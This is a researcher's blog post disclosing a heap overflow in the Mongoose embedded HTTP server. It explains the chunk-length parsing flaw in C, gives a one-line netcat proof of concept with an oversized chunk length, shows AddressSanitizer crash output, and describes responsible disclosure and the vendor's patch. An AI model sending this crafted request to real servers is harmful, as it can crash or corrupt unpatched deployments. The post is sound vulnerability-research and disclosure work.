Sometimes when stuck with some time to burn in an airport I like to poke around C code to learn new tricks and go bugspotting as a type of “sudoku for computer nerds”. This post describes a heap overflow I found in the popular Mongoose HTTP Server for embedded systems.

I was going down the list of most popular projects on GitHub written in C when I spotted Mongoose; I like embedded systems so figured I’d take a quick noodle around. A brief google suggested Cisco Talos had surfaced some bugs a few years back, so I ran a git diff to see what code had the most changes since Cisco’s audit:

$ git diff --stat=170 101afbc HEAD | grep '\.c'  | grep src
 src/mg_coap.c                           |   597 ++++
 src/mg_dns.c                            |   377 +++
 src/mg_dns_server.c                     |    71 +
 src/mg_http.c                           |  3068 ++++++++++++++++++++
 src/mg_http_cgi.c                       |   513 ++++
 src/mg_http_ssi.c                       |   193 ++
 src/mg_http_webdav.c                    |   269 ++
 src/mg_http_websocket.c                 |   517 ++++
 src/mg_mqtt.c                           |   493 ++++
 src/mg_mqtt_server.c                    |   194 ++
 src/mg_net.c                            |  1179 ++++++++
 src/mg_net_if.c                         |    53 +
 src/mg_net_if_null.c                    |   141 +
 src/mg_net_if_socket.c                  |   582 ++++
 src/mg_net_if_socks.c                   |   237 ++
 src/mg_resolv.c                         |   292 ++
 src/mg_sntp.c                           |   288 ++
 src/mg_socks.c                          |   159 ++
 src/mg_ssl_if_mbedtls.c                 |   511 ++++
 src/mg_ssl_if_openssl.c                 |   397 +++
 src/mg_uri.c                            |   261 ++
 src/mg_util.c                           |   344 +++

It’s clear that new features had been added to the web server, and I decided to focus on those. In particular, support for chunked transfer encoding appeared to have been added, which caught my eye: it’s simple enough to skim through quickly, yet it has been a source of vulnerabilities in many HTTP servers over the years due to subtle mistakes in maintaining state and doing correct arithmetic on the server side.

Chunked Encoding

Chunked encoding is a method by which an HTTP server can send multiple independent parts of a response, and a client can receive and process each chunk without having the entirety of the response data. HTTP/2 has done away with chunked encoding entirely, providing its own framing mechanisms for the same purpose.

The following snippet shows what you might see in a proxy or on the wire, with a set of length fields, followed by actual data:

HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked

3\r\n
Moz\r\n
9\r\n
Developer\r\n
0\r\n
\r\n

The Bug

I quickly found a chain of calls from the generic server entrypoint mg_http_handler() all the way down to where the server parses attacker-controlled data, converts an ASCII text representation into a number, and uses it as a length field. Anywhere a program parses attacker-controllable lengths and uses them for memory operations is a point of interest.

The following is taken from the top-level mg_http_handler() function as it parses an inbound HTTP request:

// ---snip--
    if (req_len > 0 &&
        (s = mg_get_http_header(hm, "Transfer-Encoding")) != NULL &&
        mg_vcasecmp(s, "chunked") == 0) {
      mg_handle_chunked(nc, hm, io->buf + req_len, io->len - req_len);
// ---snip--

In this code we see a check for the presence of the Transfer-Encoding header, followed by a check that its value is chunked. If so, we call into mg_handle_chunked(), seen in the next code snippet:

MG_INTERNAL size_t mg_handle_chunked(struct mg_connection *nc,
                                     struct http_message *hm, char *buf,
                                     size_t blen) {
  struct mg_http_proto_data *pd = mg_http_get_proto_data(nc);
  char *data;
  size_t i, n, data_len, body_len, zero_chunk_received = 0;
  /* Find out piece of received data that is not yet reassembled */
  body_len = (size_t) pd->chunk.body_len;
  assert(blen >= body_len);

  /* Traverse all fully buffered chunks */
  for (i = body_len; ////[1]////
       (n = mg_http_parse_chunk(buf + i, blen - i, &data, &data_len)) > 0; 
       i += n) {
    /* Collapse chunk data to the rest of HTTP body */
    memmove(buf + body_len, data, data_len); ////[2]////
    body_len += data_len;
    hm->body.len = body_len;
// ---snip--

The key pieces here are that at [1] we loop over the buffered HTTP body, calling mg_http_parse_chunk() until we run out of data. The interesting bit to note is that this function writes the parsed chunk size to the data_len variable, which is later used as the length of the memmove() call seen at [2].

So the question becomes: can we provide data which causes a memmove() with an unreasonable value and causes an overflow? Here is the function which decides that:

/*
 * Parse chunked-encoded buffer. Return 0 if the buffer is not encoded, or
 * if it's incomplete. If the chunk is fully buffered, return total number of
 * bytes in a chunk, and store data in `data`, `data_len`.
 */
static size_t mg_http_parse_chunk(char *buf, size_t len, char **chunk_data,
                                  size_t *chunk_len) {
  unsigned char *s = (unsigned char *) buf;
  size_t n = 0; /* scanned chunk length */
  size_t i = 0; /* index in s */

  /* Scan chunk length. That should be a hexadecimal number. */
  while (i < len && isxdigit(s[i])) { ////[1]////
    n *= 16;
    n += (s[i] >= '0' && s[i] <= '9') ? s[i] - '0' : tolower(s[i]) - 'a' + 10;
    i++;
  }

  /* Skip new line */
  if (i == 0 || i + 2 > len || s[i] != '\r' || s[i + 1] != '\n') {
    return 0;
  }
  i += 2;

  /* Record where the data is */
  *chunk_data = (char *) s + i;
  *chunk_len = n; ////[2]////

  /* Skip data */
  i += n; ////[3]////

  /* Skip new line */
  if (i == 0 || i + 2 > len || s[i] != '\r' || s[i + 1] != '\n') {
    return 0; ////[4]////
  }
  return i + 2;
}

At [1], we loop over the supplied chunk-length characters, ensuring each is a valid hex digit using isxdigit(), keeping a running total in the size_t variable n, and incrementing the index i for each character consumed. Note that nothing bounds the running total, so we can make n take on essentially any value here.

Following some easily achievable checks, we see a write of n to the crucial chunk_len pointer in [2].

At [3], we increment the data index i by our parsed chunk size variable n.

Finally, assuming we can pass the checks at [4], the function returns with a non-zero value and we can control the overflow length.

The issue here is quite simple: a very large value of n will wrap i around at [3], landing it on a sane enough value to pass all the later checks. It does, however, mean that the overflow length itself is enormous, as seen later in the Proof-of-Concept.

Proof Of Concept

The following demonstrates this issue in a very simple way:

  • Compile the big_upload example, with ASan enabled (mongoose/examples/big_upload)
  • Run the following:
    $ printf 'GET / HTTP/1.1\r\nTransfer-Encoding: Chunked\r\n\r\n3\r\nMoz\r\nfffffffffffffffe\r\nDeveloper\r\n0\r\n\r\n' | nc localhost 8000
  • Observe the following ASan output:
==29700==ERROR: AddressSanitizer: negative-size-param: (size=-2)
    #0 0x10e40d208 in __asan_memmove (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x51208)
    #1 0x10e3389ad in mg_handle_chunked mongoose.c:6215
    #2 0x10e336067 in mg_http_handler mongoose.c:6408
    #3 0x10e31eb69 in mg_call mongoose.c:2404
    #4 0x10e36060c in mg_recv_tcp mongoose.c:2935
    #5 0x10e3221f7 in mg_do_recv mongoose.c:2892
    #6 0x10e321dc4 in mg_if_can_recv_cb mongoose.c:2898
    #7 0x10e32b380 in mg_mgr_handle_conn mongoose.c:3856
    #8 0x10e32dfd1 in mg_socket_if_poll mongoose.c:4047
    #9 0x10e320785 in mg_mgr_poll mongoose.c:2598
    #10 0x10e2f7e52 in main big_upload.c:95
    #11 0x7fffe1a94234 in start (libdyld.dylib:x86_64+0x5234)

0x61b0000000c8 is located 72 bytes inside of 1460-byte region [0x61b000000080,0x61b000000634)
allocated by thread T0 here:
    #0 0x10e415230 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59230)
    #1 0x10e313851 in mbuf_resize mongoose.c:1549
    #2 0x10e32204b in mg_do_recv mongoose.c:2885
    #3 0x10e321dc4 in mg_if_can_recv_cb mongoose.c:2898
    #4 0x10e32b380 in mg_mgr_handle_conn mongoose.c:3856
    #5 0x10e32dfd1 in mg_socket_if_poll mongoose.c:4047
    #6 0x10e320785 in mg_mgr_poll mongoose.c:2598
    #7 0x10e2f7e52 in main big_upload.c:95
    #8 0x7fffe1a94234 in start (libdyld.dylib:x86_64+0x5234)

SUMMARY: AddressSanitizer: negative-size-param (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x51208) in __asan_memmove
[1]    29700 abort      ./big_upload

Here, we see that our very large chunk length has been parsed, has passed all the checks, and has been used in the memmove(), resulting in an out-of-bounds write. ASan suggests it’s a negative value, which is the sensible interpretation of such a large size: it’s far more likely that a -2 has propagated somewhere than that someone intended to copy 18 quintillion bytes.

Exploitation of a bug like this is very non-trivial. The process crashes on an out-of-bounds access fairly quickly, leaving no opportunity to make use of the overwritten data. Bugs like this are known as wild copies (interestingly, the linked article also references a chunked-encoding bug), and they are typically exploited by letting the overflow start and then interrupting it from another thread or possibly a signal handler. Given that Mongoose is more of a library than a standalone HTTP server, it’s hard to say what it may be built into that could increase the chances of exploitation. I’m no Chris Evans, so I’ll leave exploitation there.


Disclosure

I reached out to Mongoose via their help form, and received a quick response from the CTO. A patch was issued within a matter of days and pushed out to their customers. The patch limits the chunk-length field to 6 hex characters (capping the parsed length at 0xFFFFFF), which fixes the specific issue I called out. No CVE or advisory was released for this bug.